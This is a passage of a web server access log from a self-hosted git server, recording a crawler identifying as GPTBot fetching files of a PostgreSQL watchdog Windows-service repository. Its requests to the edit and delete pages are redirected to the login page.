"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 17336] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13603] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 13339] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 11475] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 14801] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15351] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 12450] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13488] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 13489] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 1073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 9780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 2394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 1081] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15471] [Gzip 7.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 9944] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 9946] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13454] [Gzip 6.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 12014] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 2595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 12909] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 1081] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 9952] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 15137] [Gzip 8.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 15878] [Gzip 9.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 9951] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 1087] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 9952] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 9958] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 92] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13584] [Gzip 7.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 9952] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 10535] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" -[17/Feb/2026:18:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 9959] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 1077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 3572] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 1077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 26188] [Gzip 15.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 3170] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:29:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:29:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr 